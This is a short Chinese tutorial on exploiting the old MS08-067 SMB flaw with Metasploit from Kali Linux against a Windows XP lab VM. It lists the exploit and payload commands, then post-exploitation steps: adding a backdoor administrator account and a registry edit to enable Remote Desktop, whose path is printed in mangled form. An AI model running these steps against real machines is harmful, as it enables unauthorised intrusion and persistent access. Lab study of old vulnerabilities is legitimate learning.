kalilinux攻击漏洞MS08 067
- 电脑
- 关注:1.94W次
在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境, kalilinux: winxp 要做的就是用Kali Linux里的Metasploit入侵WinXP
操作方法
(01)在Kali用命令 msfconsole 开启Metasploit (在终端里输入msfconsole)
(02)然后运行命令:use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序
(03)set LHOST #设置本地主机IP
(04)set RHOST #设置目标主机IP
(05)set payload windows/shell_bind_tcp #设置payload
(06)show options #查看设置信息
(07)exploit #实施攻击
(08)攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。
(09)添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况
(10)发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
(11)有了目标主机的cmdshell你想做什么不行吧?
(12)好了演示到此完毕!
特别提示
不要随便攻击别人,漏洞基本都修复了。
命令注意大小写
目标的winxp最好是英文的
- 文章版权属于文章作者所有,转载请注明 https://miaozhigu.com/zh/sm/diannao/xvm3r8.html